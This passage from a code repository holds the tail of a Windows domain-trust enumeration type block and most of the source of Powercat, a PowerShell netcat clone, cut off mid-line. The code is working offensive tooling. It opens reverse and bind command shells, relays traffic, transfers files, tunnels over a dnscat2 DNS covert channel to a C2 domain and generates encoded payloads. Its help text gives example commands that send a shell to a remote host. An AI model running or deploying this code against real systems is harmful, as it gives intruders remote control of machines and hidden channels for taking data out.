$Mod DsDomain.TrustType UInt32 @{ DOWNLEVEL = 1 UPLEVEL = 2 MIT = 3 DCE = 4 } $DsDomainTrustAttributes = psenum $Mod DsDomain.TrustAttributes UInt32 @{ NON_TRANSITIVE = 1 UPLEVEL_ONLY = 2 FILTER_SIDS = 4 FOREST_TRANSITIVE = 8 CROSS_ORGANIZATION = 16 WITHIN_FOREST = 32 TREAT_AS_EXTERNAL = 64 } # the DsEnumerateDomainTrusts result structure $DS_DOMAIN_TRUSTS = struct $Mod DS_DOMAIN_TRUSTS @{ NetbiosDomainName = field 0 String -MarshalAs @('LPWStr') DnsDomainName = field 1 String -MarshalAs @('LPWStr') Flags = field 2 $DsDomainFlag ParentIndex = field 3 UInt32 TrustType = field 4 $DsDomainTrustType TrustAttributes = field 5 $DsDomainTrustAttributes DomainSid = field 6 IntPtr DomainGuid = field 7 Guid } $Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32' $Netapi32 = $Types['netapi32'] $Advapi32 = $Types['advapi32'] $Wtsapi32 = $Types['wtsapi32'] ================================================ FILE: modules/Powercat.ps1 ================================================ function powercat { param( [alias("Client")][string]$c="", [alias("Listen")][switch]$l=$False, [alias("Port")][Parameter(Position=-1)][string]$p="", [alias("Execute")][string]$e="", [alias("ExecutePowershell")][switch]$ep=$False, [alias("Relay")][string]$r="", [alias("UDP")][switch]$u=$False, [alias("dnscat2")][string]$dns="", [alias("DNSFailureThreshold")][int32]$dnsft=10, [alias("Timeout")][int32]$t=60, [Parameter(ValueFromPipeline=$True)][alias("Input")]$i=$null, [ValidateSet('Host', 'Bytes', 'String')][alias("OutputType")][string]$o="Host", [alias("OutputFile")][string]$of="", [alias("Disconnect")][switch]$d=$False, [alias("Repeater")][switch]$rep=$False, [alias("GeneratePayload")][switch]$g=$False, [alias("GenerateEncoded")][switch]$ge=$False, [alias("Help")][switch]$h=$False ) ############### HELP ############### $Help = " powercat - Netcat, The Powershell Version Github Repository: https://github.com/besimorhino/powercat This script attempts to implement the features of netcat in a powershell script. It also contains extra features such as built-in relays, execute powershell, and a dnscat2 client. Usage: powercat [-c or -l] [-p port] [options] -c Client Mode. Provide the IP of the system you wish to connect to. If you are using -dns, specify the DNS Server to send queries to. -l Listen Mode. Start a listener on the port specified by -p. -p Port. The port to connect to, or the port to listen on. -e Execute. Specify the name of the process to start. -ep Execute Powershell. Start a pseudo powershell session. You can declare variables and execute commands, but if you try to enter another shell (nslookup, netsh, cmd, etc.) the shell will hang. -r Relay. Used for relaying network traffic between two nodes. Client Relay Format: -r :: Listener Relay Format: -r : DNSCat2 Relay Format: -r dns::: -u UDP Mode. Send traffic over UDP. Because it's UDP, the client must send data before the server can respond. -dns DNS Mode. Send traffic over the dnscat2 dns covert channel. Specify the dns server to -c, the dns port to -p, and specify the domain to this option, -dns. This is only a client. Get the server here: https://github.com/iagox86/dnscat2 -dnsft DNS Failure Threshold. This is how many bad packets the client can recieve before exiting. Set to zero when receiving files, and set high for more stability over the internet. -t Timeout. The number of seconds to wait before giving up on listening or connecting. Default: 60 -i Input. Provide data to be sent down the pipe as soon as a connection is established. Used for moving files. You can provide the path to a file, a byte array object, or a string. You can also pipe any of those into powercat, like 'aaaaaa' | powercat -c 10.1.1.1 -p 80 -o Output. Specify how powercat should return information to the console. Valid options are 'Bytes', 'String', or 'Host'. Default is 'Host'. -of Output File. Specify the path to a file to write output to. -d Disconnect. powercat will disconnect after the connection is established and the input from -i is sent. Used for scanning. -rep Repeater. powercat will continually restart after it is disconnected. Used for setting up a persistent server. -g Generate Payload. Returns a script as a string which will execute the powercat with the options you have specified. -i, -d, and -rep will not be incorporated. -ge Generate Encoded Payload. Does the same as -g, but returns a string which can be executed in this way: powershell -E -h Print this help message. Examples: Listen on port 8000 and print the output to the console. powercat -l -p 8000 Connect to 10.1.1.1 port 443, send a shell, and enable verbosity. powercat -c 10.1.1.1 -p 443 -e cmd -v Connect to the dnscat2 server on c2.example.com, and send dns queries to the dns server on 10.1.1.1 port 53. powercat -c 10.1.1.1 -p 53 -dns c2.example.com Send a file to 10.1.1.15 port 8000. powercat -c 10.1.1.15 -p 8000 -i C:\inputfile Write the data sent to the local listener on port 4444 to C:\outfile powercat -l -p 4444 -of C:\outfile Listen on port 8000 and repeatedly server a powershell shell. powercat -l -p 8000 -ep -rep Relay traffic coming in on port 8000 over tcp to port 9000 on 10.1.1.1 over tcp. powercat -l -p 8000 -r tcp:10.1.1.1:9000 Relay traffic coming in on port 8000 over tcp to the dnscat2 server on c2.example.com, sending queries to 10.1.1.1 port 53. powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com " if($h){return $Help} ############### HELP ############### ############### VALIDATE ARGS ############### $global:Verbose = $Verbose if($of -ne ''){$o = 'Bytes'} if($dns -eq "") { if((($c -eq "") -and (!$l)) -or (($c -ne "") -and $l)){return "You must select either client mode (-c) or listen mode (-l)."} if($p -eq ""){return "Please provide a port number to -p."} } if(((($r -ne "") -and ($e -ne "")) -or (($e -ne "") -and ($ep))) -or (($r -ne "") -and ($ep))){return "You can only pick one of these: -e, -ep, -r"} if(($i -ne $null) -and (($r -ne "") -or ($e -ne ""))){return "-i is not applicable here."} if($l) { $Failure = $False netstat -na | Select-String LISTENING | % {if(($_.ToString().split(":")[1].split(" ")[0]) -eq $p){Write-Output ("The selected port " + $p + " is already in use.") ; $Failure=$True}} if($Failure){break} } if($r -ne "") { if($r.split(":").Count -eq 2) { $Failure = $False netstat -na | Select-String LISTENING | % {if(($_.ToString().split(":")[1].split(" ")[0]) -eq $r.split(":")[1]){Write-Output ("The selected port " + $r.split(":")[1] + " is already in use.") ; $Failure=$True}} if($Failure){break} } } ############### VALIDATE ARGS ############### ############### UDP FUNCTIONS ############### function Setup_UDP { param($FuncSetupVars) if($global:Verbose){$Verbose = $True} $c,$l,$p,$t = $FuncSetupVars $FuncVars = @{} $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding if($l) { $SocketDestinationBuffer = New-Object System.Byte[] 65536 $EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Any), $p $FuncVars["Socket"] = New-Object System.Net.Sockets.UDPClient $p $PacketInfo = New-Object System.Net.Sockets.IPPacketInformation Write-Verbose ("Listening on [0.0.0.0] port " + $p + " [udp]") $ConnectHandle = $FuncVars["Socket"].Client.BeginReceiveMessageFrom($SocketDestinationBuffer,0,65536,[System.Net.Sockets.SocketFlags]::None,[ref]$EndPoint,$null,$null) $Stopwatch = [System.Diagnostics.Stopwatch]::StartNew() while($True) { if($Host.UI.RawUI.KeyAvailable) { if(@(17,27) -contains ($Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown").VirtualKeyCode)) { Write-Verbose "CTRL or ESC caught. Stopping UDP Setup..." $FuncVars["Socket"].Close() $Stopwatch.Stop() break } } if($Stopwatch.Elapsed.TotalSeconds -gt $t) { $FuncVars["Socket"].Close() $Stopwatch.Stop() Write-Verbose "Timeout!" ; break } if($ConnectHandle.IsCompleted) { $SocketBytesRead = $FuncVars["Socket"].Client.EndReceiveMessageFrom($ConnectHandle,[ref]([System.Net.Sockets.SocketFlags]::None),[ref]$EndPoint,[ref]$PacketInfo) Write-Verbose ("Connection from [" + $EndPoint.Address.IPAddressToString + "] port " + $p + " [udp] accepted (source port " + $EndPoint.Port + ")") if($SocketBytesRead -gt 0){break} else{break} } } $Stopwatch.Stop() $FuncVars["InitialConnectionBytes"] = $SocketDestinationBuffer[0..([int]$SocketBytesRead-1)] } else { if(!$c.Contains(".")) { $IPList = @() [System.Net.Dns]::GetHostAddresses($c) | Where-Object {$_.AddressFamily -eq "InterNetwork"} | %{$IPList += $_.IPAddressToString} Write-Verbose ("Name " + $c + " resolved to address " + $IPList[0]) $EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse($IPList[0])), $p } else { $EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse($c)), $p } $FuncVars["Socket"] = New-Object System.Net.Sockets.UDPClient $FuncVars["Socket"].Connect($c,$p) Write-Verbose ("Sending UDP traffic to " + $c + " port " + $p + "...") Write-Verbose ("UDP: Make sure to send some data so the server can notice you!") } $FuncVars["BufferSize"] = 65536 $FuncVars["EndPoint"] = $EndPoint $FuncVars["StreamDestinationBuffer"] = New-Object System.Byte[] $FuncVars["BufferSize"] $FuncVars["StreamReadOperation"] = $FuncVars["Socket"].Client.BeginReceiveFrom($FuncVars["StreamDestinationBuffer"],0,$FuncVars["BufferSize"],([System.Net.Sockets.SocketFlags]::None),[ref]$FuncVars["EndPoint"],$null,$null) return $FuncVars } function ReadData_UDP { param($FuncVars) $Data = $null if($FuncVars["StreamReadOperation"].IsCompleted) { $StreamBytesRead = $FuncVars["Socket"].Client.EndReceiveFrom($FuncVars["StreamReadOperation"],[ref]$FuncVars["EndPoint"]) if($StreamBytesRead -eq 0){break} $Data = $FuncVars["StreamDestinationBuffer"][0..([int]$StreamBytesRead-1)] $FuncVars["StreamReadOperation"] = $FuncVars["Socket"].Client.BeginReceiveFrom($FuncVars["StreamDestinationBuffer"],0,$FuncVars["BufferSize"],([System.Net.Sockets.SocketFlags]::None),[ref]$FuncVars["EndPoint"],$null,$null) } return $Data,$FuncVars } function WriteData_UDP { param($Data,$FuncVars) $FuncVars["Socket"].Client.SendTo($Data,$FuncVars["EndPoint"]) | Out-Null return $FuncVars } function Close_UDP { param($FuncVars) $FuncVars["Socket"].Close() } ############### UDP FUNCTIONS ############### ############### DNS FUNCTIONS ############### function Setup_DNS { param($FuncSetupVars) if($global:Verbose){$Verbose = $True} function ConvertTo-HexArray { param($String) $Hex = @() $String.ToCharArray() | % {"{0:x}" -f [byte]$_} | % {if($_.Length -eq 1){"0" + [string]$_} else{[string]$_}} | % {$Hex += $_} return $Hex } function SendPacket { param($Packet,$DNSServer,$DNSPort) $Command = ("set type=TXT`nserver $DNSServer`nset port=$DNSPort`nset domain=.com`nset retry=1`n" + $Packet + "`nexit") $result = ($Command | nslookup 2>&1 | Out-String) if($result.Contains('"')){return ([regex]::Match($result.replace("bio=",""),'(?<=")[^"]*(?=")').Value)} else{return 1} } function Create_SYN { param($SessionId,$SeqNum,$Tag,$Domain) return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "00" + $SessionId + $SeqNum + "0000" + $Domain) } function Create_FIN { param($SessionId,$Tag,$Domain) return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "02" + $SessionId + "00" + $Domain) } function Create_MSG { param($SessionId,$SeqNum,$AcknowledgementNumber,$Data,$Tag,$Domain) return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "01" + $SessionId + $SeqNum + $AcknowledgementNumber + $Data + $Domain) } function DecodePacket { param($Packet) if((($Packet.Length)%2 -eq 1) -or ($Packet.Length -eq 0)){return 1} $AcknowledgementNumber = ($Packet[10..13] -join "") $SeqNum = ($Packet[14..17] -join "") [byte[]]$ReturningData = @() if($Packet.Length -gt 18) { $PacketElim = $Packet.Substring(18) while($PacketElim.Length -gt 0) { $ReturningData += [byte[]][Convert]::ToInt16(($PacketElim[0..1] -join ""),16) $PacketElim = $PacketElim.Substring(2) } } return $Packet,$ReturningData,$AcknowledgementNumber,$SeqNum } function AcknowledgeData { param($ReturningData,$AcknowledgementNumber) $Hex = [string]("{0:x}" -f (([uint16]("0x" + $AcknowledgementNumber) + $ReturningData.Length) % 65535)) if($Hex.Length -ne 4){$Hex = (("0"*(4-$Hex.Length)) + $Hex)} return $Hex } $FuncVars = @{} $FuncVars["DNSServer"],$FuncVars["DNSPort"],$FuncVars["Domain"],$FuncVars["FailureThreshold"] = $FuncSetupVars if($FuncVars["DNSPort"] -eq ''){$FuncVars["DNSPort"] = "53"} $FuncVars["Tag"] = "" $FuncVars["Domain"] = ("." + $FuncVars["Domain"]) $FuncVars["Create_SYN"] = ${function:Create_SYN} $FuncVars["Create_MSG"] = ${function:Create_MSG} $FuncVars["Create_FIN"] = ${function:Create_FIN} $FuncVars["DecodePacket"] = ${function:DecodePacket} $FuncVars["ConvertTo-HexArray"] = ${function:ConvertTo-HexArray} $FuncVars["AckData"] = ${function:AcknowledgeData} $FuncVars["SendPacket"] = ${function:SendPacket} $FuncVars["SessionId"] = ([string](Get-Random -Maximum 9999 -Minimum 1000)) $FuncVars["SeqNum"] = ([string](Get-Random -Maximum 9999 -Minimum 1000)) $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding $FuncVars["Failures"] = 0 $SYNPacket = (Invoke-Command $FuncVars["Create_SYN"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["Tag"],$FuncVars["Domain"])) $ResponsePacket = (Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($SYNPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"])) $DecodedPacket = (Invoke-Command $FuncVars["DecodePacket"] -ArgumentList @($ResponsePacket)) if($DecodedPacket -eq 1){return "Bad SYN response. Ensure your server is set up correctly."} $ReturningData = $DecodedPacket[1] if($ReturningData -ne ""){$FuncVars["InputData"] = ""} $FuncVars["AckNum"] = $DecodedPacket[2] $FuncVars["MaxMSGDataSize"] = (244 - (Invoke-Command $FuncVars["Create_MSG"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["AckNum"],"",$FuncVars["Tag"],$FuncVars["Domain"])).Length) if($FuncVars["MaxMSGDataSize"] -le 0){return "Domain name is too long."} return $FuncVars } function ReadData_DNS { param($FuncVars) if($global:Verbose){$Verbose = $True} $PacketsData = @() $PacketData = "" if($FuncVars["InputData"] -ne $null) { $Hex = (Invoke-Command $FuncVars["ConvertTo-HexArray"] -ArgumentList @($FuncVars["InputData"])) $SectionCount = 0 $PacketCount = 0 foreach($Char in $Hex) { if($SectionCount -ge 30) { $SectionCount = 0 $PacketData += "." } if($PacketCount -ge ($FuncVars["MaxMSGDataSize"])) { $PacketsData += $PacketData.TrimEnd(".") $PacketCount = 0 $SectionCount = 0 $PacketData = "" } $PacketData += $Char $SectionCount += 2 $PacketCount += 2 } $PacketData = $PacketData.TrimEnd(".") $PacketsData += $PacketData $FuncVars["InputData"] = "" } else { $PacketsData = @("") } [byte[]]$ReturningData = @() foreach($PacketData in $PacketsData) { try{$MSGPacket = Invoke-Command $FuncVars["Create_MSG"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["AckNum"],$PacketData,$FuncVars["Tag"],$FuncVars["Domain"])} catch{ Write-Verbose "DNSCAT2: Failed to create packet." ; $FuncVars["Failures"] += 1 ; continue } try{$Packet = (Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($MSGPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"]))} catch{ Write-Verbose "DNSCAT2: Failed to send packet." ; $FuncVars["Failures"] += 1 ; continue } try { $DecodedPacket = (Invoke-Command $FuncVars["DecodePacket"] -ArgumentList @($Packet)) if($DecodedPacket.Length -ne 4){ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..."; $FuncVars["Failures"] += 1 ; continue } $FuncVars["AckNum"] = $DecodedPacket[2] $FuncVars["SeqNum"] = $DecodedPacket[3] $ReturningData += $DecodedPacket[1] } catch{ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..." ; $FuncVars["Failures"] += 1 ; continue } if($DecodedPacket -eq 1){ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..." ; $FuncVars["Failures"] += 1 ; continue } } if($FuncVars["Failures"] -ge $FuncVars["FailureThreshold"]){break} if($ReturningData -ne @()) { $FuncVars["AckNum"] = (Invoke-Command $FuncVars["AckData"] -ArgumentList @($ReturningData,$FuncVars["AckNum"])) } return $ReturningData,$FuncVars } function WriteData_DNS { param($Data,$FuncVars) $FuncVars["InputData"] = $FuncVars["Encoding"].GetString($Data) return $FuncVars } function Close_DNS { param($FuncVars) $FINPacket = Invoke-Command $FuncVars["Create_FIN"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["Tag"],$FuncVars["Domain"]) Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($FINPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"]) | Out-Null } ############### DNS FUNCTIONS ############### ########## TCP FUNCTIONS ########## function Setup_TCP { param($FuncSetupVars) $c,$l,$p,$t = $FuncSetupVars if($global:Verbose){$Verbose = $True} $FuncVars = @{} if(!$l) { $FuncVars["l"] = $False $Socket = New-Object System.Net.Sockets.TcpClient Write-Verbose "Connecting..." $Handle = $Socket.BeginConnect($c,$p,$null,$null) } else { $FuncVars["l"] = $True Write-Verbose ("Listening on [0.0.0.0] (port " + $p + ")") $Socket = New-Object System.Net.Sockets.TcpListener $p $Socket.Start() $Handle = $Socket.BeginAcceptTcpClient($null, $null) } $Stopwatch = [System.Diagnostics.Stopwatch]::StartNew() while($True) { if($Host.UI.RawUI.KeyAvailable) { if(@(17,27) -contains ($Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown").VirtualKeyCode)) { Write-Verbose "CTRL or ESC caught. Stopping TCP Setup..." if($FuncVars["l"]){$Socket.Stop()} else{$Socket.Close()} $Stopwatch.Stop() break } } if($Stopwatch.Elapsed.TotalSeconds -gt $t) { if(!$l){$Socket.Close()} else{$Socket.Stop()} $Stopwatch.Stop() Write-Verbose "Timeout!" ; break break } if($Handle.IsCompleted) { if(!$l) { try { $Socket.EndConnect($Handle) $Stream = $Socket.GetStream() $BufferSize = $Socket.ReceiveBufferSize Write-Verbose ("Connection to " + $c + ":" + $p + " [tcp] succeeded!") } catch{$Socket.Close(); $Stopwatch.Stop(); break} } else { $Client = $Socket.EndAcceptTcpClient($Handle) $Stream = $Client.GetStream() $BufferSize = $Client.ReceiveBufferSize Write-Verbose ("Connection from [" + $Client.Client.RemoteEndPoint.Address.IPAddressToString + "] port " + $port + " [tcp] accepted (source port " + $Client.Client.RemoteEndPoint.Port + ")") } break } } $Stopwatch.Stop() if($Socket -eq $null){break} $FuncVars["Stream"] = $Stream $FuncVars["Socket"] = $Socket $FuncVars["BufferSize"] = $BufferSize $FuncVars["StreamDestinationBuffer"] = (New-Object System.Byte[] $FuncVars["BufferSize"]) $FuncVars["StreamReadOperation"] = $FuncVars["Stream"].BeginRead($FuncVars["StreamDestinationBuffer"], 0, $FuncVars["BufferSize"], $null, $null) $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding $FuncVars["StreamBytesRead"] = 1 return $FuncVars } function ReadData_TCP { param($FuncVars) $Data = $null if($FuncVars["StreamBytesRead"] -eq 0){break} if($FuncVars["StreamReadOperation"].IsCompleted) { $StreamBytesRead = $FuncVars["Stream"].EndRead($FuncVars["StreamReadOperation"]) if($StreamBytesRead -eq 0){break} $Data = $FuncVars["StreamDestinationBuffer"][0..([int]$StreamBytesRead-1)] $FuncVars["StreamReadOperation"] = $FuncVars["Stream"].BeginRead($FuncVars["StreamDestinationBuffer"], 0, $FuncVars["BufferSize"], $null, $null) } return $Data,$FuncVars } function WriteData_TCP { param($Data,$FuncVars) $FuncVars["Stream"].Write($Data, 0, $Data.Length) return $FuncVars } function Close_TCP { param($FuncVars) try{$FuncVars["Stream"].Close()} catch{} if($FuncVars["l"]){$FuncVars["Socket"].Stop()} else{$FuncVars["Socket"].Close()} } ########## TCP FUNCTIONS ########## ########## CMD FUNCTIONS ########## function Setup_CMD { param($FuncSetupVars) if($global:Verbose){$Verbose = $True} $FuncVars = @{} $ProcessStartInfo = New-Object System.Diagnostics.ProcessStartInfo $ProcessStartInfo.FileName = $FuncSetupVars[0] $ProcessStartInfo.UseShellExecute = $False $ProcessStartInfo.RedirectStandardInput = $True $ProcessStartInfo.RedirectStandardOutput = $True $ProcessStartInfo.RedirectStandardError = $True $FuncVars["Process"] = [System.Diagnostics.Process]::Start($ProcessStartInfo) Write-Verbose ("Starting Process " + $FuncSetupVars[0] + "...") $FuncVars["Process"].Start() | Out-Null $FuncVars["StdOutDestinationBuffer"] = New-Object System.Byte[] 65536 $FuncVars["StdOutReadOperation"] = $FuncVars["Process"].StandardOutput.BaseStream.BeginRead($FuncVars["StdOutDestinationBuffer"], 0, 65536, $null, $null) $FuncVars["StdErrDestinationBuffer"] = New-Object System.Byte[] 65536 $FuncVars["StdErrReadOperation"] = $FuncVars["Process"].StandardError.BaseStream.BeginRead($FuncVars["StdErrDestinationBuffer"], 0, 65536, $null, $null) $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding return $FuncVars } function ReadData_CMD { param($FuncVars) [byte[]]$Data = @() if($FuncVars["StdOutReadOperation"].IsCompleted) { $StdOutBytesRead = $FuncVars["Process"].StandardOutput.BaseStream.EndRead($FuncVars["StdOutReadOperation"]) if($StdOutBytesRead -eq 0){break} $Data += $FuncVars["StdOutDestinationBuffer"][0..([int]$StdOutBytesRead-1)] $FuncVars["StdOutReadOperation"] = $FuncVars["Process"].StandardOutput.BaseStream.BeginRead($FuncVars["StdOutDestinationBuffer"], 0, 65536, $null, $null) } if($FuncVars["StdErrReadOperation"].IsCompleted) { $StdErrBytesRead = $FuncVars["Process"].StandardError.BaseStream.EndRead($FuncVars["StdErrReadOperation"]) if($StdErrBytesRead -eq 0){break} $Data += $FuncVars["StdErrDestinationBuffer"][0..([int]$StdErrBytesRead-1)] $FuncVars["StdErrReadOperation"] = $FuncVars["Process"].StandardError.BaseStream.BeginRead($FuncVars["StdErrDestinationBuffer"], 0, 65536, $null, $null) } return $Data,$FuncVars } function WriteData_CMD { param($Data,$FuncVars) $FuncVars["Process"].StandardInput.WriteLine($FuncVars["Encoding"].GetString($Data).TrimEnd("`r").TrimEnd("`n")) return $FuncVars } function Close_CMD { param($FuncVars) $FuncVars["Process"] | Stop-Process } ########## CMD FUNCTIONS ########## ########## POWERSHELL FUNCTIONS ########## function Main_Powershell { param($Stream1SetupVars) try { $encoding = New-Object System.Text.AsciiEncoding [byte[]]$InputToWrite = @() if($i -ne $null) { Write-Verbose "Input from -i detected..." if(Test-Path $i){ [byte[]]$InputToWrite = ([io.file]::ReadAllBytes($i)) } elseif($i.GetType().Name -eq "Byte[]"){ [byte[]]$InputToWrite = $i } elseif($i.GetType().Name -eq "String"){ [byte[]]$InputToWrite = $Encoding.GetBytes($i) } else{Write-Host "Unrecognised input type." ; return} } Write-Verbose "Setting up Stream 1... (ESC/CTRL to exit)" try{$Stream1Vars = Stream1_Setup $Stream1SetupVars} catch{Write-Verbose "Stream 1 Setup Failure" ; break} Write-Verbose "Setting up Stream 2... (ESC/CTRL to exit)" try { $IntroPrompt = $Encoding.GetBytes("Windows PowerShell`nCopyright (C) 2013 Microsoft Corporation. All rights reserved.`n`n" + ("PS " + (pwd).Path + "> ")) $Prompt = ("PS " + (pwd).Path + "> ") $CommandToExecute = "" $Data = $null } catch { Write-Verbose "Stream 2 Setup Failure" ; break } if($InputToWrite -ne @()) { Write-Verbose "Writing input to Stream 1..." try{$Stream1Vars = Stream1_WriteData $InputToWrite $Stream1Vars} catch{Write-Host "Failed to write input to Stream 1" ; break} } if($d){Write-Verbose "-d (disconnect) Activated. Disconnecting..." ; break} Write-Verbose "Both Communication Streams Established. Redirecting Data Between Streams..." while($True) { try { ##### Stream2 Read ##### $Prompt = $null $ReturnedData = $null if($CommandToExecute -ne "") { try{[byte[]]$ReturnedData = $Encoding.GetBytes((IEX $CommandToExecute 2>&1 | Out-String))} catch{[byte[]]$ReturnedData = $Encoding.GetBytes(($_ | Out-String))} $Prompt = $Encoding.GetBytes(("PS " + (pwd).Path + "> ")) } $Data += $IntroPrompt $IntroPrompt = $null $Data += $ReturnedData $Data += $Prompt $CommandToExecute = "" ##### Stream2 Read ##### if($Data -ne $null){$Stream1Vars = Stream1_WriteData $Data $Stream1Vars} $Data = $null } catch { Write-Verbose "Failed to redirect data from Stream 2 to Stream 1" ; break } try { $Data,$Stream1Vars = Stream1_ReadData $Stream1Vars if($Data -ne $null){$CommandToExecute = $Encoding.GetString($Data)} $Data = $null } catch { Write-Verbose "Failed to redirect data from Stream 1 to Stream 2" ; break } } } finally { try { Write-Verbose "Closing Stream 1..." Stream1_Close $Stream1Vars } catch { Write-Verbose "Failed to close Stream 1" } } } ########## POWERSHELL FUNCTIONS ########## ########## CONSOLE FUNCTIONS ########## function Setup_Console { param($FuncSetupVars) $FuncVars = @{} $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding $FuncVars["Output"] = $FuncSetupVars[0] $FuncVars["OutputBytes"] = [byte[]]@() $FuncVars["OutputString"] = "" return $FuncVars } function ReadData_Console { param($FuncVars) $Data = $null if($Host.UI.RawUI.KeyAvailable) { $Data = $FuncVars["Encoding"].GetBytes((Read-Host) + "`n") } return $Data,$FuncVars } function WriteData_Console { param($Data,$FuncVars) switch($FuncVars["Output"]) { "Host" {Write-Host -n $FuncVars["Encoding"].GetString($Data)} "String" {$FuncVars["OutputString"] += $FuncVars["Encoding"].GetString($Data)} "Bytes" {$FuncVars["OutputBytes"] += $Data} } return $FuncVars } function Close_Console { param($FuncVars) if($FuncVars["OutputString"] -ne ""){return $FuncVars["OutputString"]} elseif($FuncVars["OutputBytes"] -ne @()){return $FuncVars["OutputBytes"]} return } ########## CONSOLE FUNCTIONS ########## ########## MAIN FUNCTION ########## function Main { param($Stream1SetupVars,$Stream2SetupVars) try { [byte[]]$InputToWrite = @() $Encoding = New-Object System.Text.AsciiEncoding if($i -ne $null) { Write-Verbose "Input from -i detected..." if(Test-Path $i){ [byte[]]$InputToWrite = ([io.file]::ReadAllBytes($i)) } elseif($i.GetType().Name -eq "Byte[]"){ [byte[]]$InputToWrite = $i } elseif($i.GetType().Name -eq "String"){ [byte[]]$InputToWrite = $Encoding.GetBytes($i) } else{Write-Host "Unrecognised input type." ; return} } Write-Verbose "Setting up Stream 1..." try{$Stream1Vars = Stream1_Setup $Stream1SetupVars} catch{Write-Verbose "Stream 1 Setup Failure" ; break} Write-Verbose "Setting up Stream 2..." try{$Stream2Vars = Stream2_Setup $Stream2SetupVars} catch{Write-Verbose "Stream 2 Setup Failure" ; break} $Data = $null if($InputToWrite -ne @()) { Write-Verbose "Writing input to Stream 1..." try{$Stream1Vars = Stream1_WriteData $InputToWrite $Stream1Vars} catch{Write-Host "Failed to write input to Stream 1" ; break} } if($d){Write-Verbose "-d (disconnect) Activated. Disconnecting..." ; break} Write-Verbose "Both Communication Streams Established. Redirecting Data Between Streams..." while($True) { try { $Data,$Stream2Vars = Stream2_ReadData $Stream2Vars if($Data -ne $null){$Stream1Vars = Stream1_WriteData $Data $Stream1Vars} $Data = $null } catch { Write-Verbose "Failed to redirect data from Stream 2 to Stream 1" ; break } try { $Data,$Stream1Vars = Stream1_ReadData $Stream1Vars if($Data -ne $null){$Stream2Vars = Stream2_WriteData $Data $Stream2Vars} $Data = $null } catch { Write-Verbose "Failed to redirect data from Stream 1 to Stream 2" ; break } } } finally { try { #Write-Verbose "Closing Stream 2..." Stream2_Close $Stream2Vars } catch { Write-Verbose "Failed to close Stream 2" } try { #Write-Verbose "Closing Stream 1..." Stream1_Close $Stream1Vars } catch { Write-Verbose "Failed to close Stream 1" } } } ########## MAIN FUNCTION ########## ########## GENERATE PAYLOAD ########## if($u) { Write-Verbose "Set Stream 1: UDP" $FunctionString = ("function Stream1_Setup`n{`n" + ${function:Setup_UDP} + "`n}`n`n") $FunctionString += ("function Stream1_ReadData`n{`n" + ${function:ReadData_UDP} + "`n}`n`n") $FunctionString += ("function Stream1_WriteData`n{`n" + ${function:WriteData_UDP} + "`n}`n`n") $FunctionString += ("function Stream1_Close`n{`n" + ${function:Close_UDP} + "`n}`n`n") if($l){$InvokeString = "Main @('',`$True,'$p','$t') "} else{$InvokeString = "Main @('$c',`$False,'$p','$t') "} } elseif($dns -ne "") { Write-Verbose "Set Stream 1: DNS" $FunctionString = ("function Stream1_Setup`n{`n" + ${function:Setup_DNS} + "`n}`n`n") $FunctionString += ("function Stream1_ReadData`n{`n" + ${function:ReadData_DNS} + "`n}`n`n") $FunctionString += ("function Stream1_WriteData`n{`n" + ${function:WriteData_DNS} + "`n}`n`n") $FunctionString += ("function Stream1_Close`n{`n" + ${function:Close_DNS} + "`n}`n`n") if($l){return "This feature is not available."} else{$InvokeString = "Main @('$c','$p','$dns',$dnsft) "} } else { Write-Verbose "Set Stream 1: TCP" $FunctionString = ("function Stream1_Setup`n{`n" + ${function:Setup_TCP} + "`n}`n`n") $FunctionString += ("function Stream1_ReadData`n{`n" + ${function:ReadData_TCP} + "`n}`n`n") $FunctionString += ("function Stream1_WriteData`n{`n" + ${function:WriteData_TCP} + "`n}`n`n") $FunctionString += ("function Stream1_Close`n{`n" + ${function:Close_TCP} + "`n}`n`n") if($l){$InvokeString = "Main @('',`$True,$p,$t) "} else{$InvokeString = "Main @('$c',`$False,$p,$t) "} } if($e -ne "") { Write-Verbose "Set Stream 2: Process" $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_CMD} + "`n}`n`n") $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_CMD} + "`n}`n`n") $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_CMD} + "`n}`n`n") $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_CMD} + "`n}`n`n") $InvokeString += "@('$e')`n`n" } elseif($ep) { Write-Verbose "Set Stream 2: Powershell" $InvokeString += "`n`n" } elseif($r -ne "") { if($r.split(":")[0].ToLower() -eq "udp") { Write-Verbose "Set Stream 2: UDP" $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_UDP} + "`n}`n`n") $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_UDP} + "`n}`n`n") $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_UDP} + "`n}`n`n") $FunctionString += 